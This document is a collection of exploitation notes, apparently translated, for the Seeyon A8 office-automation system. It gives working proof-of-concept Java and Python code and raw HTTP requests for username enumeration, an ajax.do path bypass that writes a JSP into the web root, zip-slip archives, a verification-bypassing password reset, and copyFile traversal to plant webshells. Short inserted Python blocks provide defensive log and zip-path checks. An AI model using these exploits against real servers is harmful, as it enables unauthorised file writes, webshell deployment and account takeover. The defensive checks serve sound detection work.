Username enumeration

/seeyon/rest/password/retrieve/send/username
Enumerate whether a user exists through the binding response.

Higher versions use encrypted transport; change the request to POST + JSON:

/seeyon/rest/password/retrieve/send

{"loginName":"gJ90ikKmIGY="}

Encryption algorithm:

import java.security.Key;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESedeKeySpec;
import javax.crypto.spec.IvParameterSpec;

public class Main {
    public static void main(String[] args) {
        String pass = "sysadmin";
        try {
            // 3DES (DESede) key material; DESedeKeySpec uses the first 24 bytes
            DESedeKeySpec spec = new DESedeKeySpec("[email protected]$#M1#$".getBytes());
            SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("desede");
            Key deskey = keyFactory.generateSecret(spec);
            // CBC mode with PKCS5 padding and a fixed 8-byte IV
            Cipher cipher = Cipher.getInstance("desede/CBC/PKCS5Padding");
            IvParameterSpec ips = new IvParameterSpec("01234567".getBytes());
            cipher.init(Cipher.ENCRYPT_MODE, deskey, ips);
            byte[] secData = cipher.doFinal(pass.getBytes());
            String enData = Base64.getEncoder().encodeToString(secData);
            System.out.println(enData);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

ajax.do authorization bypass

Analysis write-up: "Vulnerability analysis of ajax.do in a certain OA" (某OA ajax.do处漏洞分析)

A common vulnerability in lower versions: the route restriction is bypassed through a parsing discrepancy; the write-up gives the autoinstall.do route as the bypass.
PoC:
Generate the gzip data:

import com.seeyon.ctp.common.excel.DataRecord;
import com.seeyon.ctp.common.log.CtpLogFactory;
import com.seeyon.ctp.util.ZipUtil;
import com.seeyon.ctp.util.json.JSONUtil;
import org.apache.commons.logging.Log;

import java.net.URLEncoder;
import java.util.ArrayList;

public class fileToExcelManagerPayload {
    private static final Log LOGGER = CtpLogFactory.getLog(fileToExcelManagerPayload.class);

    public static void main(String[] args) throws Exception {
        // The column-name string is what gets written into the target file
        DataRecord d = new DataRecord();
        String[] c = {"\"\r\n" + "<% out.println(\"ttttttttt\"); %>" + "\"\r\n"};
        d.setColumnName(c);
        // Argument list passed to managerMethod=saveExcelInBase
        final ArrayList<Object> list = new ArrayList<>();
        list.add("../webapps/ROOT/x.jsp");
        list.add("\"\"");
        list.add(d);
        final String json = JSONUtil.toJSONString(list);
        // requestCompress=gzip: the server gunzips the arguments parameter
        String strArgs = ZipUtil.compressResponse(json, "gzip", "UTF-8", LOGGER);
        System.out.println(URLEncoder.encode(strArgs, "UTF-8"));
        System.out.println("end");
    }
}

Request:

POST /seeyon/autoinstall.do/../ajax.do?method=ajaxAction&managerName=fileToExcelManager HTTP/1.1
Host: xxx
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 6357

managerMethod=saveExcelInBase&managerName=fileToExcelManager&method=ajaxAction&requestCompress=gzip&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00%5D%C2%8D%C3%81%0A%C3%820%10D%7F%C2%A5%2C%14%14B%C3%A2%C2%B9%C2%8A%C3%A7%1E%C3%84%C2%82%14%3C4%3D%C2%A46%C3%98H%C2%9A%C2%84dC%05%C3%B1%C3%9FM%09zp%C3%B64%C2%8F%C3%A5M%07%C2%94%C2%B2E%0E%C3%82%C2%B9%C3%80.M%C3%93%C2%B2%27%7D%04%07%04x%3A+%2F%C2%B8Y%1Dgs%16%C2%B3%C2%84%C2%AA%5B%C2%A9%C3%A7%C3%A6P%166%22u%5E%19%C3%94f%C3%83%01%C2%BF%C3%A1%C2%B0%C3%9D%17%C3%A51%C2%BFAO%60%14%28j%29%C3%86%C2%93%0A%C2%98%04%C2%89d%C3%A1U%C3%A1%04%C2%95%C2%89Z%13%08%C2%93%C2%94%C2%98%172%40%C2%85%C3%BAWB%1C%C3%9A%C2%BF%5EKu%C2%9F%C2%92nG%C3%80%C3%9Be%C3%95%C2%BE%C3%BB%0F%C3%8BJZ%C2%B7%C3%8A%00%00%00
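As an added defender-side example (not from the original notes), the following Python scans access-log request lines for the two path tricks that appear on this page, a `/../` segment in front of ajax.do and a `;` path parameter, by comparing the literal path with the path the servlet container actually dispatches on. The log lines are constructed samples.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic), common-log style.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jan/2024:10:00:01 +0800] "POST /seeyon/autoinstall.do/../ajax.do?method=ajaxAction&managerName=fileToExcelManager HTTP/1.1" 200 512
10.0.0.5 - - [08/Jan/2024:10:00:02 +0800] "POST /seeyon/ajax.do;Jsessionid=a?method=ajaxAction&managerName=govdocGBManager HTTP/1.1" 200 88
10.0.0.9 - - [08/Jan/2024:10:00:03 +0800] "GET /seeyon/main.do?method=main HTTP/1.1" 200 4096
10.0.0.9 - - [08/Jan/2024:10:00:04 +0800] "POST /seeyon/ajax.do?method=ajaxAction&managerName=portalCssManager HTTP/1.1" 403 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def canonical_path(target: str) -> str:
    """Path the servlet container actually dispatches on: query string dropped,
    ';name=value' path parameters stripped from every segment, percent-decoded,
    and '.' / '..' segments collapsed."""
    path = target.split("?", 1)[0]
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath(unquote("/".join(segments)))


def is_path_confusion(target: str) -> bool:
    """True when the literal path carries a '.'/'..' segment or a ';' path
    parameter, i.e. a prefix-matching filter and the final servlet may have
    seen different resources."""
    raw_path = unquote(target.split("?", 1)[0])
    return any(seg in (".", "..") or ";" in seg for seg in raw_path.split("/"))


def flag_suspicious(log_text: str) -> list:
    """Return (dispatched_path, raw_target) pairs for lines worth alerting on."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_path_confusion(m.group("target")):
            hits.append((canonical_path(m.group("target")), m.group("target")))
    return hits


if __name__ == "__main__":
    for dispatched, raw in flag_suspicious(SAMPLE_LOG):
        print(f"ALERT dispatch={dispatched} raw={raw}")
```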

Back-end file decompression

The principle is the same in every case: a low-privileged user uploads a zip, and directory traversal during extraction writes a JSP.
The difference from the ofd case is that it completes in one step and uses a different interface.

Upload request construction:

<!DOCTYPE html>
<html lang="en">
 <head>
 <meta charset="UTF-8">
 <title>Title</title>
 </head>
 <body>
 <h1>uploadFile</h1>
 <form action="http://192.168.203.25/seeyon/workflow/cie.do?method=importProcess" method="post" enctype="multipart/form-data">
 <p><input type="file" name="file"></p>
 <p><input type="submit" value="submit"></p>
 </form>
 </body>
</html>

Archive generation:

import zipfile

if __name__ == "__main__":
    file = "h1.jsp"
    with open(file, "rb") as f:
        binary = f.read()
    # Entry name with traversal segments: extraction code that joins it to the
    # target directory without normalising writes outside that directory.
    with zipfile.ZipFile("t2.zip", "w", zipfile.ZIP_DEFLATED) as zip_file:
        zip_file.writestr("..\\..\\webapps\\ROOT\\bak1.jsp", binary)

Lower-version interface: cie.do
PoC:

POST /seeyon/workflow/cie.do?method=importProcess HTTP/1.1
Host: 192.168.203.25
Content-Length: 353
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryG4m3BNZiXbTVIltz
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=D61255AD8F0ACA34024A3CFE7C89340D
Connection: close
------WebKitFormBoundaryG4m3BNZiXbTVIltz
Content-Disposition: form-data; name="file"; filename="test.zip"
Content-Type: application/zip

zip数据
------WebKitFormBoundaryG4m3BNZiXbTVIltz--

Higher-version interface: designer.do
PoC:

POST /seeyon/workflow/designer.do?method=importProcess HTTP/1.1
Host: 192.168.203.25
Content-Length: 353
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryG4m3BNZiXbTVIltz
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=D61255AD8F0ACA34024A3CFE7C89340D
Connection: close
------WebKitFormBoundaryG4m3BNZiXbTVIltz
Content-Disposition: form-data; name="file"; filename="test.zip"
Content-Type: application/zip

zip数据
------WebKitFormBoundaryG4m3BNZiXbTVIltz--

User password reset

An old bug: the verification code is bypassed to reset the password.
PoC:

POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: 192.168.136.55
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 45
Content-Type: application/json
Accept-Encoding: gzip

{"loginName": "test","password":"1qaz@WSX"}

Back-end file upload points

All of them filter jsp, so they have to be combined with encryption.
Those that go through save keep the id and can be chained with ofd; the others only upload.

save upload; location: base/upload/2024/01/01/id

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5
Content-Length: 841
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="firstSave"

true
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="callMethod"

resizeLayout
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="isEncrypt"

0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="takeOver"

false
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="type"

0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file1"; filename="11.zip"
Content-Type: text/plain

111
--59229605f98b8cf290a7b8908b34616b--

Plain upload; location: base/upload/2024/01/01/id

POST /seeyon/fileUpload.do?method=processUpload&type=1&applicationCategory=1&extensions=jpg,gif,jpeg,png&maxSize=5242880&callback=imgUploadCallBack&closeWindow=false&serverTime=true HTTP/1.1
Host: 192.168.144.1
Content-Length: 199
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDmqbiz5fkZYKfWPI
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C40461224
Connection: close

------WebKitFormBoundaryDmqbiz5fkZYKfWPI
Content-Disposition: form-data; name="upload"; filename="image.gif"
Content-Type: image/gif

gif89a
achaeaf
------WebKitFormBoundaryDmqbiz5fkZYKfWPI--

save upload; location: base/resources/portal/css/id

POST /seeyon/ajax.do?method=ajaxAction&managerName=portalCssManager&rnd=57507 HTTP/1.1
Accept: */*
Host: 192.168.1.11
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C4046122
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

arguments=%5B%22aaaaa%22%5D&managerMethod=generateCssFileByCssStr

ofd extraction vulnerability

Requires ordinary-user privileges; at its core it is zip-extraction directory traversal, and it is essentially fixed in v8 and above.
The upload still goes through the old interface.
After uploading, get the id: search for fileurls=fileurls, and the id follows it.
Extraction interface:

POST /seeyon/ajax.do;Jsessionid=a?method=ajaxAction&managerName=govdocGBManager&rnd=29981 HTTP/1.1
Accept: */*
CSRFTOKEN: 
Host: 192.168.246.4
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=1; avatarImageUrl=3003611276195810894; login_locale=zh_CN
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

arguments=["-7373142480696292225"]&managerMethod=getOfdMetadata

This interface can also be tried; there is little difference:

GET /seeyon/content/content.do?method=invokingForm&extensions=zip&isNew=1&ofdFileId=-3217079395985044654&subApp=2 HTTP/1.1
Accept: */*
Host: 192.168.246.4
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=1; avatarImageUrl=3003611276195810894; login_locale=zh_CN
Accept-Encoding: gzip, deflate

Copy file

Copies a file to a new location; allows directory traversal and changing the extension.

POST /seeyon/ajax.do?method=ajaxAction&managerName=cipSynSchemeManager&rnd=29981 HTTP/1.1
Accept: */*
Host: 192.168.1.11
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C40461224;
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

arguments=["../../../../upload/2024/01/08/-3156853247588808973","../../ApacheJetspeed/webapps/ROOT/1234.jsp"]&managerMethod=copyFile
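Added example, not part of the original notes: a path-containment check that rejects the zip entry name used in the back-end decompression and ofd cases above, and the same traversal paths when they appear as copyFile arguments. The archive it inspects is constructed in memory.

```python
import io
import posixpath
import zipfile


def path_escapes(name: str) -> bool:
    """True if joining `name` to an extraction (or copy) directory would land
    outside it. Backslashes count as separators, because Java path handling
    on Windows treats them that way; absolute names and drive letters are
    rejected outright; '..' segments are resolved, not merely searched for."""
    normalized = name.replace("\\", "/")
    if len(normalized) > 1 and normalized[1] == ":":   # C:/... style prefix
        return True
    # posixpath.join drops the root for absolute names, so those fail the
    # prefix test below as well.
    resolved = posixpath.normpath(posixpath.join("/root", normalized))
    return resolved != "/root" and not resolved.startswith("/root/")


def audit_zip(data: bytes) -> list:
    """Names of the entries in a zip archive that must not be extracted."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [info.filename for info in zf.infolist() if path_escapes(info.filename)]


def build_sample_zip() -> bytes:
    """Constructed test archive: a benign entry plus the traversal entry name
    from the notes above (the content is a placeholder string)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("process/definition.xml", "<process/>")
        zf.writestr("..\\..\\webapps\\ROOT\\bak1.jsp", "placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    print("rejected entries:", audit_zip(build_sample_zip()))
    # Same containment test applied to the two copyFile arguments shown above
    for arg in ("../../../../upload/2024/01/08/-3156853247588808973",
                "../../ApacheJetspeed/webapps/ROOT/1234.jsp"):
        print(arg, "->", "reject" if path_escapes(arg) else "allow")
```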

A8 installation

Start the s1 agent first, then start the A8 service from the web page.
To enable remote debugging, add the line SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 to ApacheJetspeed\bin\startup.bat and restart the A8 service.


"Alone in the world, with nothing to hold me back"